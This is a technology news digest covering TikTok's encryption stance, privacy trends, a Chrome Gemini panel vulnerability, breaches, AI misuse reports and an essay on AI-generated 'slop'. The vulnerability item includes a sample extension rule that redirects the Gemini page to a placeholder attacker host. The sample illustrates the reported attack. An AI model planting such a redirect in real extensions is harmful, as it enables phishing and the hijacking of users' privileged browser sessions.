TikTok rejects end-to-end encryption citing safety concerns

TikTok will not adopt end-to-end encryption for direct messages. The company argues that the technology would hinder safety teams’ and law enforcement’s efforts to detect harmful content in private messages, which it believes could make users less safe online.

Encrypted messaging ensures that only the sender and recipient can read a conversation, and the technology is widely used across the social media industry. Rivals including Facebook Messenger, Instagram, and X have adopted it, saying that protecting private communication is central to user privacy.

The issue is especially sensitive because the platform has long faced scrutiny over possible links between its parent company, ByteDance, and the government of the People’s Republic of China, something the company has repeatedly denied. Reflecting these concerns, US lawmakers earlier this year ordered the separation of TikTok’s US operations from its global business.

The company told the BBC that encrypted messaging would make it impossible for police and platform safety teams to read direct messages when needed. TikTok framed the decision as a matter of user protection, particularly for younger users, and said it regards the ability to monitor messages as crucial for addressing harmful behaviour.

Industry analyst Matt Navarra said the platform’s decision to ‘swim against the tide’ is ‘notable’ but presents ‘challenging optics’. He noted, ‘Grooming and harassment risks are present in DMs [direct messages], so TikTok can state it is prioritising proactive safety over privacy absolutism,’ though he added that the decision ‘places TikTok out of alignment with global privacy expectations’.

Online privacy faces new pressures in the age of social media

Online privacy is eroding as digital services collect ever-growing volumes of personal data and surveillance becomes part of daily technology use. The debate has intensified as social media platforms, advertisers, and connected devices expand their ability to track behaviour, preferences, and habits.

Analysts say younger generations have adapted to this reality rather than resisting it. ‘In 2026, online privacy is a luxury, not a right,’ says Thomas Bunting, an analyst at the UK innovation think tank Nesta. He argues many people have grown up accepting data collection as a trade-off for access to online services, noting: ‘We’ve been taught how to deal with it.’

Advocates warn that the erosion of online privacy could have wider social consequences. Cybersecurity expert Prof Alan Woodward from the University of Surrey says the issue goes beyond personal privacy. ‘People should care about online privacy because it shapes who has power over their lives,’ he says, arguing that privacy is ‘about having something to protect: freedom of thought, experimentation, dissent and personal development without permanent surveillance.’

Despite a growing number of privacy tools and regulations, data exposure remains widespread. According to Statista, more than 1.35 billion people were affected by data breaches, hacks, or exposure in 2024 alone. At the same time, more than 160 countries now have privacy legislation, while users regularly encounter cookie consent prompts that govern how their data is collected online.

Experts say frustration with privacy controls reflects a broader ‘privacy paradox’, in which people express concern about data protection but rarely change their behaviour. Cisco’s Consumer Privacy Survey found that while 89% of respondents said they care about privacy, only 38% actively take steps to protect their data.

As philosopher Carissa VĂ©liz notes, the challenge is not simply awareness but a sense of agency: ‘Mostly, people don’t feel like they have control.’ She argues that protecting privacy requires stronger regulation, responsible technology design, and cultural change, adding: ‘It’s about having [access to] the right tech, but also using it.’

Chrome Gemini vulnerability allowed camera and file access

A high-severity vulnerability in Chrome’s integrated Gemini AI assistant exposed users to potential camera and microphone activation, local file access, and phishing attacks. The issue, tracked as CVE-2026-0628, was disclosed by Palo Alto Networks’ Unit 42 and patched by Google in January 2026.

Gemini Live operates as a privileged AI panel embedded within the browser, capable of web page summarisation and task automation. To enable multimodal functionality, the panel is granted elevated permissions, including access to screenshots, local files, and device hardware.

Researchers identified inconsistent handling of the declarativeNetRequest API when gemini.google.com was loaded inside the AI side panel rather than a standard browser tab. While extensions could inject JavaScript in both cases, the panel context inherited browser-level privileges.
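By way of illustration, the sketch below shows how an extension ordinarily registers a dynamic declarativeNetRequest redirect rule scoped to the Gemini origin. It is a generic example of the API surface involved, not the Unit 42 proof of concept, and attacker.example is a placeholder:

```typescript
// background.ts (Manifest V3 service worker) — illustrative only.
// Assumes the "declarativeNetRequest" permission plus host permissions
// for the affected origins are declared in manifest.json.
chrome.runtime.onInstalled.addListener(() => {
  chrome.declarativeNetRequest.updateDynamicRules({
    removeRuleIds: [1], // drop any stale copy of the rule before re-adding it
    addRules: [
      {
        id: 1,
        priority: 1,
        // Redirect requests for the Gemini origin to another page.
        action: {
          type: chrome.declarativeNetRequest.RuleActionType.REDIRECT,
          redirect: { url: 'https://attacker.example/lookalike-panel' },
        },
        condition: {
          urlFilter: '||gemini.google.com/',
          resourceTypes: [
            chrome.declarativeNetRequest.ResourceType.MAIN_FRAME,
            chrome.declarativeNetRequest.ResourceType.SUB_FRAME,
          ],
        },
      },
    ],
  });
});
```

According to the researchers, rules like this were handled differently when gemini.google.com loaded inside the side panel than in a normal tab, and that inconsistency is what allowed a malicious extension to interpose on a context carrying browser-level privileges.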

A malicious extension exploiting this distinction could hijack the trusted panel and execute arbitrary code with elevated access. Potential impacts included silent activation of the camera or microphone, screenshot capture, local file exfiltration, and highly credible phishing attacks.

Google released a fix on 5 January 2026 following responsible disclosure. Users running the latest version of Chrome are protected, and organisations are advised to ensure updates are applied across all endpoints.

Deutsche Telekom and Nokia advance open and AI-native RAN

Nokia and Deutsche Telekom have expanded their collaboration to advance cloud-based, disaggregated, and AI-native RAN technologies. The strengthened Innovation Cooperation Program deepens joint work in Cloud RAN, open interfaces, and next-generation solutions.

The partnership builds on years of cooperation focused on open and flexible architectures. Both companies said the expanded effort aims to improve network efficiency, programmability, and long-term operational value for service providers.

Work on Open Fronthaul integration is being intensified following earlier multivendor deployments in Germany linking Nokia baseband units with O-RAN-compliant radios. Additional integrations covering Open Fronthaul and Cloud RAN are progressing within confidential development programmes.

The companies are also advancing O-RAN-aligned management capabilities through open O1 interfaces and deeper integration of configuration management. A vendor-independent Service Management and Orchestration platform remains central to Deutsche Telekom’s multivendor RAN strategy.

Nokia will act as Deutsche Telekom’s strategic co-creation partner for AI-native RAN development. Joint efforts will focus on AI-powered receivers, adaptive beamforming, predictive optimisation, and lab and field validation to support intelligent, autonomous mobile networks.

Anthropic’s Claude climbs past ChatGPT in downloads

App Store charts have shifted sharply in the consumer AI market, with Anthropic’s Claude now surpassing ChatGPT in downloads. The change marks one of the most notable ranking reversals in recent months.

The spike in downloads appears tied to public reaction rather than new product features. App rankings often fluctuate, but this shift coincides with growing debate over how AI companies collaborate with governments.

Anthropic has positioned Claude around strict usage policies, including restrictions on domestic surveillance and lethal autonomous weapons. That stance has resonated with users concerned about the ethical deployment of AI technologies.

Claude’s ascent underscores a more competitive chatbot landscape in which transparency and public confidence play an increasingly important role. Rankings are also becoming more volatile as users show a growing willingness to switch platforms.

AT&T data breach settlement wins preliminary approval in $177 million deal

A federal judge in Texas has preliminarily approved a $177 million settlement resolving claims that AT&T failed to safeguard consumer data in two separate breaches. The company denies wrongdoing but agreed to establish compensation funds covering affected customers nationwide.

The agreement creates two non-reversionary funds: $149 million for individuals whose personal data appeared on the dark web, and $28 million for customers whose call and text logs were accessed. It covers a March 2024 breach and a separate incident between May 2022 and early 2023.

Eligible class members may submit claims for cash payments, with amounts depending on the number of valid submissions, and may also receive up to 24 months of credit monitoring. The deadline to opt out or object is 17 October 2025, with a final approval hearing set for 3 December 2025.

Legal and administrative costs, attorneys’ fees, and service awards will be paid from the settlement funds. The case resolves claims brought on behalf of all living US residents whose data was exposed in the two AT&T breaches.

The settlement follows other recent legal challenges facing AT&T, including class actions filed by New York pensioners alleging the company misled investors about the environmental impact of its lead-sheathed cables.

AI misuse exposed as OpenAI details global disinformation and scam networks

OpenAI said criminal and state-linked groups misused ChatGPT for disinformation, scams and covert influence. Its latest threat report details coordinated account bans and highlights how AI tools are embedded within broader operational workflows rather than used in isolation.

One investigation linked accounts to Chinese law enforcement engaged in what were described as ‘cyber special operations’. Activities included planning influence campaigns, mass-reporting dissidents and drafting forged materials, with related efforts continuing through other tools despite model refusals.

The report also outlined a Cambodia-based romance scam targeting young men in Indonesia through a fake dating agency. Operators combined manual prompting with automated chatbots to sustain conversations and facilitate financial fraud, leading to account removals.

Separately, accounts tied to Russia’s ‘Rybar’ network used ChatGPT to draft and translate posts distributed across multiple platforms. OpenAI noted that campaign impact depended more on account reach and coordination than on AI-generated content alone.

Across China, Russia and parts of Southeast Asia, actors treated AI as one tool among many, alongside fake profiles, paid advertising and forged documents. OpenAI called for cross-industry vigilance, stressing the need to analyse behavioural patterns across platforms.

CarGurus data leak surfaces as ShinyHunters publishes archive

The ShinyHunters extortion group has published a 6.1 GB archive that it claims contains more than 12 million records stolen from CarGurus, a US-based automotive platform. Have I Been Pwned has listed the dataset, reporting that roughly 3.7 million of the records appear to be new.

The exposed information includes email addresses, IP addresses, full names, phone numbers, physical addresses, user account IDs, and finance-related application data belonging to CarGurus users. Dealer account details and subscription information were also reportedly included in the archive.

CarGurus has not issued a public statement confirming a breach. However, Have I Been Pwned says it attempts to verify the authenticity of datasets before adding them to its database, suggesting the leaked material has undergone at least some validation.
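Have I Been Pwned also exposes a v3 API that users can query to see whether an address appears in indexed breaches such as this one. Below is a minimal sketch, assuming a valid API key (which the breachedaccount endpoint requires) and a placeholder address:

```typescript
// hibp-check.ts — minimal sketch; run server-side (Node 18+ has global fetch).
// The API key and email address below are placeholders.
const HIBP_API_KEY = 'YOUR-HIBP-API-KEY';

async function breachesFor(email: string): Promise<string[]> {
  const url =
    'https://haveibeenpwned.com/api/v3/breachedaccount/' +
    encodeURIComponent(email) +
    '?truncateResponse=true'; // return breach names only
  const res = await fetch(url, {
    headers: {
      'hibp-api-key': HIBP_API_KEY,
      'user-agent': 'breach-check-sketch', // HIBP rejects requests without a user agent
    },
  });
  if (res.status === 404) return []; // address not found in any indexed breach
  if (!res.ok) throw new Error(`HIBP request failed with status ${res.status}`);
  const breaches = (await res.json()) as { Name: string }[];
  return breaches.map((b) => b.Name);
}

breachesFor('user@example.com').then((names) =>
  console.log(names.length ? `Found in: ${names.join(', ')}` : 'No breaches found'),
);
```

The endpoint returns HTTP 404 when an account is absent from every indexed breach, which is why a 404 is treated as an empty result rather than an error.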

Security experts warn that the availability of the data could increase the risk of phishing. Users are advised to remain cautious of unsolicited communications and potential scams that may leverage the exposed personal information.

ShinyHunters has recently claimed attacks against multiple large organisations across telecoms, fintech, retail, and media. The group is known for using social engineering tactics, including voice phishing and malicious OAuth applications, to gain access to SaaS platforms and extract customer data.

EDPS and regulators unite to address misuse of AI imagery across jurisdictions

The European Data Protection Supervisor (EDPS) and authorities from 61 jurisdictions issued a joint statement on AI-generated imagery, warning about tools that create realistic depictions of identifiable individuals without consent. The move underscores concerns over privacy, dignity and child safety.

Authorities said advances in AI image and video tools, especially when integrated into social media platforms, have enabled non-consensual intimate imagery, defamatory depictions, and other harmful content. Children and vulnerable groups are seen as particularly at risk.

The EDPS and the other signatories reminded organisations that AI content-generation systems must comply with applicable data protection and privacy laws. They stressed that creating non-consensual intimate imagery may constitute a criminal offence in many jurisdictions.

Organisations are urged to implement safeguards against misuse of personal data, ensure transparency about system capabilities and uses, and provide accessible mechanisms for swift content removal. Stronger protections and age-appropriate information are expected where children are involved.

Authorities signalled plans for coordinated responses, including enforcement, policy development and education initiatives. The EDPS and fellow signatories urged organisations to engage proactively with regulators and ensure innovation does not undermine fundamental rights.

AI slop’s meteoric rise and the impact of synthetic content in 2026

In December 2025, the Macquarie Dictionary, Merriam-Webster, and the American Dialect Society named ‘slop’ as the Word of the Year, reflecting a widespread reaction to AI-generated content online, often referred to as ‘AI slop’. By choosing ‘slop’, a term typically associated with unappetising animal feed, they captured the unease about the digital clutter created by AI tools.

As LLMs and AI tools became accessible to more people, many saw them as opportunities for profit, whether by producing artificial content for marketing and entertainment or by gaming social media algorithms. However, despite advances in video and image generation, a gap persists between perceived and actual quality: creators often overestimate how easily AI content escapes notice, and audiences who do notice it grow increasingly sceptical of its value online.

As generative AI systems expand, the debate goes beyond digital clutter to deeper concerns about trust, market incentives, and regulatory resilience. How will societies manage the social, economic, and governance impacts of an information ecosystem increasingly shaped by automated abundance? Put simply, is AI slop more than a passing digital nuisance, or are we needlessly worried about a transient vogue that will eventually fade?

The social aspect of AI slop’s influence

The most visible effects of AI slop emerge on large social media platforms such as YouTube, TikTok, and Instagram. Users frequently encounter AI-generated images and videos that appropriate celebrity likenesses without consent, depict fabricated events, or present sensational and misleading scenarios. Comment sections often become informal verification spaces, where some users identify visual inconsistencies and warn others, while many remain uncertain about the content’s authenticity.

However, no platform has suffered the AI slop effect as much as Facebook, and a glance at its demographics helps the pieces come together. According to multiple studies, Facebook’s largest age cohort is adults aged 25-34, yet users over 55 account for nearly 24 percent of the total. While seniors do not constitute the majority (yet), younger generations have been steadily migrating to platforms such as TikTok, Instagram, and X, leaving the most popular platform to the whims of the older generation.

Due to factors such as cognitive decline, positivity bias, or digital (il)literacy, older social media users are more likely to fall for scams and fraud. Such conditions make Facebook an ideal place for spreading low-quality AI slop and false information. Scammers use AI tools to create fake images and videos about made-up crises to raise money for causes that are not real.

The lack of regulation on Meta’s side is the most glaring sore spot, evidenced by the company pushing back against the EU’s Digital Services Act (DSA) and Digital Markets Act (DMA), viewing them as ‘overreaching’ and stifling innovation. The math is simple: content generates engagement, resulting in more revenue for Facebook and other platforms owned by Meta. Whether that content is authentic and high-quality or low-effort AI slop, the numbers don’t care.

The economics behind AI slop

At its core, AI content is not just a social media phenomenon, but an economic one as well. GenAI tools drastically reduce the cost and time required to produce all types of content, and when production approaches zero marginal cost, the incentive to churn out AI slop seems too good to ignore. Even minimal engagement can generate positive returns through advertising, affiliate marketing, or platform monetisation schemes.
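As a back-of-the-envelope illustration (all figures hypothetical), the break-even arithmetic shifts dramatically once production cost collapses:

```typescript
// Views needed to recoup production cost at a given RPM
// (ad revenue per 1,000 views). All figures are invented.
function breakEvenViews(productionCostUsd: number, rpmUsd: number): number {
  return Math.ceil((productionCostUsd / rpmUsd) * 1000);
}

console.log(breakEvenViews(200, 1)); // conventional video costing $200: 200,000 views
console.log(breakEvenViews(0.5, 1)); // AI-generated clip costing ~$0.50: 500 views
```

At the same ad rate, cutting production cost from hundreds of dollars to fifty cents lowers the break-even audience from two hundred thousand views to five hundred, which is why even marginal engagement can turn a profit.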

AI content production goes beyond exploiting social media algorithms and monetisation policies. SEO can now be automated at scale, generating thousands of keyword-optimised articles within hours, while affiliate link farming lets creators monetise product recommendations with minimal editorial input.

On video platforms like TikTok and YouTube, synthetic voice-overs and AI-generated visuals are on full display, piggybacking on trending topics and using AI-generated thumbnails to attract views. Thanks to AI tools, creators can publish topical AI-generated content in minutes, jumping on the hottest trends and driving clicks faster than any authentic content creation method allows.

To rub salt into the wound, YouTube content creators share the sentiment that they are victims of the platform’s double standards in enforcing its strict community guidelines. Even the largest YouTube channels are routinely flagged for breaches ranging from copyright claims to depictions of dangerous or illegal activities and harmful speech. AI slop videos, on the other hand, seem to fly under YouTube’s radar, breeding further resentment towards AI-generated content.

Businesses marketing their services online are likewise finding generative AI to be the way to go, since most users make little effort to distinguish authentic content and attach little importance to the difference. Instead of paying voice-over artists and illustrators, it is far cheaper to generate the desired post in minutes, adding fuel to an already raging fire. Some might call it AI slop, but again, the numbers are what truly matter.

The regulatory challenge of AI slop

AI slop is not only a social and economic issue, but also a regulatory one. The problem is not a single AI-generated post that promotes harmful behaviour or misleading information, but the sheer scale of synthetic content entering digital platforms. When large volumes of low-value or deceptive material circulate on the web, they can distort information ecosystems and make moderation a tough challenge. Such a predicament shifts the focus from individual violations to broader systemic effects.

In the EU, the DSA requires very large online platforms to assess and mitigate the systemic risks linked to their services. While the DSA does not specifically target AI slop, its provisions on transparency, content recommendation algorithms, and risk mitigation could apply if AI content significantly affects public discourse or enables fraud. The challenge lies in defining the point at which sheer volume overwhelms quality control and turns isolated misuse into a systemic issue.

Debates around labelling and transparency also play a large role. Policymakers and platforms have explored ways to flag AI-generated content through disclosures or watermarking; OpenAI’s Sora, for example, stamps its videos with a faint watermark, though it is easy for an uninitiated viewer to miss. Nevertheless, labelling alone may not address deeper concerns if recommendation systems continue to prioritise engagement above all else. The issue is not only whether users know content is AI-generated, but how such content is ranked, amplified, and monetised.

More broadly, AI slop highlights the limits of traditional content moderation. As generative tools make production faster and cheaper, enforcement systems may struggle to keep pace. Regulation, therefore, faces a structural question: can existing digital governance frameworks preserve information quality in an environment where automated content production continues to grow?

Building resilience in the era of AI slop

Humans are considered the most adaptable species on Earth, and for good reason. While AI slop has exposed weaknesses in platform design, monetisation models, and moderation systems, it may also serve as a catalyst for adaptation. Unless regulatory bodies unite under one banner and agree to ban AI content for good, it is safe to say that synthetic content is here to stay. However, sooner or later, systemic regulations will evolve to address this new AI craze and mitigate its negative effects.

The AI slop bubble is bound to burst at some point, as online users come to favour meticulously crafted content, whether authentic or artificial, over low-quality output. Incentives may evolve alongside content saturation, shifting the focus from quantity to quality. Advertisers and brands often prioritise credibility and brand safety, which could encourage platforms to refine their ranking systems to reward originality, reliability, and verified creators.

Transparency requirements, systemic risk assessments, and discussions around provenance disclosure mechanisms imply that governance is responding to the realities of generative AI. Instead of marking the deterioration of digital spaces, AI slop may represent a transitional phase in which platforms, policymakers, and users are challenged to adjust their expectations and norms accordingly.

Finally, the long-term outcome will depend entirely on whether innovation, market incentives, and governance structures can converge around information quality and resilience. In that sense, AI slop may ultimately function less as a permanent state of affairs and more as a stress test to separate the wheat from the chaff. In the upcoming struggle between user experience and generative AI tools, the former will have the final say, which is an encouraging thought.
